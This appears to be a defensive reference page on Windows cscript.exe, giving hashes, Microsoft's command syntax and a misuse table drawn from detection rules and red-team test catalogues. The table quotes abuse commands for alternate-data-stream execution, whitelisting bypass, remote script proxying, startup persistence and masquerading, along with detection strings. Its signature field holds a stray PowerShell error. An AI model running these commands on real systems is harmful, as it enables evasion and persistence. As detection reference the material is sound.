cscript.exe

  • File Path: C:\windows\system32\cscript.exe
  • Description: Microsoft Console Based Script Host

Hashes

Type Hash
MD5 40945B8B68C48961B354DFEDE17EC04E
SHA1 BF418408435C892C93D32A0104FD6277634AF6BC
SHA256 3E0B04AB2C927DCBB0BB64AA99B3060481FA7876AC4C12863D649E8BEADC8814
SHA384 254A1DBA6EC20A0396CC6556D16DD89AC15262DACD3B48B28220559F56451DB153CBC193C63CB1A49E486F3D89F23ECD
SHA512 41E0DE6B566CA2EE992084329AD4B3EE4380BF520A7F662A9C0BC1F1A377A7D30FDC55DD2AF83290755EED69AAEAA1FF01823E7F4A60F046EF603E063100EDAB
SSDEEP 3072:mg/FZFEv+nhtRSFvLQy4Ca0jiFFWRXd1yZb0JdpsQzo2Zxttwq:5FEvm5SpLQ4zbZh

Signature

  • Status: The file C:\windows\system32\cscript.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: cscript.exe.mui
  • Product Name: Microsoft Windows Script Host
  • Company Name: Microsoft Corporation
  • File Version: 5.8.9600.16384
  • Product Version: 5.8.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of cscript.exe being misused. While cscript.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\cscript.exe' DRL 1.0
sigma godmode_sigma_rule.yml - 'cscript' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\cscript.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'cscript' DRL 1.0
sigma file_event_win_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) DRL 1.0
sigma file_event_win_win_cscript_wscript_dropper.yml - '\cscript.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\cscript.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\cscript.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_apt_cloudhopper.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml description: Adversaries can abuse of C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target DRL 1.0
sigma proc_creation_win_lolbin_cscript_gathernetworkinfo.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml title: WScript or CScript Dropper DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml description: Detects wscript/cscript executions of scripts located in user directories DRL 1.0
sigma proc_creation_win_malware_script_dropper.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mal_adwind.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_manage_bde_lolbas.yml - 'cscript' DRL 1.0
sigma proc_creation_win_mmc_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_multiple_suspicious_cli.yml - cscript.exe DRL 1.0
sigma proc_creation_win_office_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml title: Cscript Visual Basic Script Execution DRL 1.0
sigma proc_creation_win_susp_cscript_vbs.yml Image\|endswith: \cscript.exe DRL 1.0
sigma proc_creation_win_susp_powershell_parent_combo.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml title: Suspicious Registration via cscript.exe DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml - https://ss64.com/vb/cscript.html DRL 1.0
sigma proc_creation_win_susp_registration_via_cscript.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_execution.yml description: Detects suspicious file execution by wscript and cscript DRL 1.0
sigma proc_creation_win_susp_script_execution.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'cscript.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\cscript.exe' DRL 1.0
sigma proc_creation_win_susp_winrm_awl_bypass.yml description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) DRL 1.0
sigma proc_creation_win_susp_winrm_execution.yml Image\|endswith: '\cscript.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\cscript.exe' DRL 1.0
sigma registry_event_susp_run_key_img_folder.yml - 'cscript' DRL 1.0
LOLBAS Testxlst.yml - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out  
LOLBAS Cscript.yml Name: Cscript.exe  
LOLBAS Cscript.yml - Command: cscript c:\ads\file.txt:script.vbs  
LOLBAS Cscript.yml Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).  
LOLBAS Cscript.yml - Path: C:\Windows\System32\cscript.exe  
LOLBAS Cscript.yml - Path: C:\Windows\SysWOW64\cscript.exe  
LOLBAS Cscript.yml - IOC: Cscript.exe executing files from alternate data streams  
LOLBAS Cscript.yml - IOC: DotNet CLR libraries loaded into cscript.exe  
LOLBAS Cscript.yml - IOC: DotNet CLR Usage Log - cscript.exe.log  
LOLBAS Manage-bde.yml - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf  
LOLBAS Manage-bde.yml - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf  
LOLBAS Winrm.yml - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'  
LOLBAS Winrm.yml Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location  
atomic-red-team index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md cscript #{vbscript} > $env:TEMP\T1059.005.out.txt MIT License. © 2018 Red Canary
atomic-red-team T1082.md cscript #{vbscript} MIT License. © 2018 Red Canary
atomic-red-team T1105.md CScript.exe AtomicTestT1105.js //E:JScript MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md $macrocode = “ Open "#{jse_path}” For Output As #1n Write #1, “WScript.Quit"n Close #1n Shell$ "cscript.exe #{jse_path}“`n” MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Uses cscript //E:jscript to download a file MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md cscript //E:Jscript #{script_file} MIT License. © 2018 Red Canary
atomic-red-team T1216.md cscript %windir%\System32\manage-bde.wsf MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1216.001.md cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost “script:#{remote_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md cscript.exe /E:Jscript “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse” MIT License. © 2018 Red Canary
signature-base apt_monsoon.yar $x3 = “ cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d” fullword wide CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = “cscript.exe //T:20 //Nologo “ fullword ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $a1 = “taskkill /F /IM cscript.exe” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_scripts.yar $s1 = “/c "C:\windows\temp\cscript" C:\windows\temp\iis.vbs” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_wannacry.yar $s2 = “cscript.exe //nologo m.vbs” fullword ascii CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


cscript

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Starts a script to run in a command-line environment.

[!IMPORTANT] Performing this task does not require you to have administrative credentials. Therefore, as a security best practice, consider performing this task as a user without administrative credentials.

Syntax

cscript <scriptname.extension> [/b] [/d] [/e:<engine>] [{/h:cscript | /h:wscript}] [/i] [/job:<identifier>] [{/logo | /nologo}] [/s] [/t:<seconds>] [x] [/u] [/?] [<scriptarguments>]
Parameters
Parameter Description
scriptname.extension Specifies the path and file name of the script file with optional file name extension.
/b Specifies batch mode, which does not display alerts, scripting errors, or input prompts.
/d Starts the debugger.
/e:<engine> Specifies the engine that is used to run the script.
/h:cscript Registers cscript.exe as the default script host for running scripts.
/h:wscript Registers wscript.exe as the default script host for running scripts. The default.
/i Specifies interactive mode, which displays alerts, scripting errors, and input prompts. The default, and the opposite of /b.
/job:<identifier> Runs the job identified by identifier in a .wsf script file.
/logo Specifies that the Windows Script Host banner is displayed in the console before the script runs. The default, and the opposite of /nologo.
/nologo Specifies that the Windows Script Host banner is not displayed before the script runs.
/s Saves the current command-prompt options for the current user.
/t:<seconds> Specifies the maximum time the script can run (in seconds). You can specify up to 32,767 seconds. The default is no time limit.
/u Specifies Unicode for input and output that is redirected from the console.
/x Starts the script in the debugger.
/? Displays available command parameters and provides help for using them. The same as typing cscript.exe with no parameters and no script.
scriptarguments Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/).
Remarks
  • Each parameter is optional; however, you can’t specify script arguments without specifying a script. If you don’t specify a script or any script arguments, cscript.exe displays the cscript.exe syntax and the valid host options.

  • The /t parameter prevents excessive running of scripts by setting a timer. When the run time exceeds the specified value, cscript interrupts the script engine and ends the process.

  • Windows script files usually have one of the following file name extensions: .wsf, .vbs, .js. Windows Script Host can use .wsf script files. Each .wsf file can use multiple scripting engines and perform multiple jobs.

  • if you double-click a script file with an extension that has no association, the Open With dialog box appears. Select wscript or cscript, and then select Always use this program to open this file type. This registers wscript.exe or cscript as the default script host for files of this file type.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.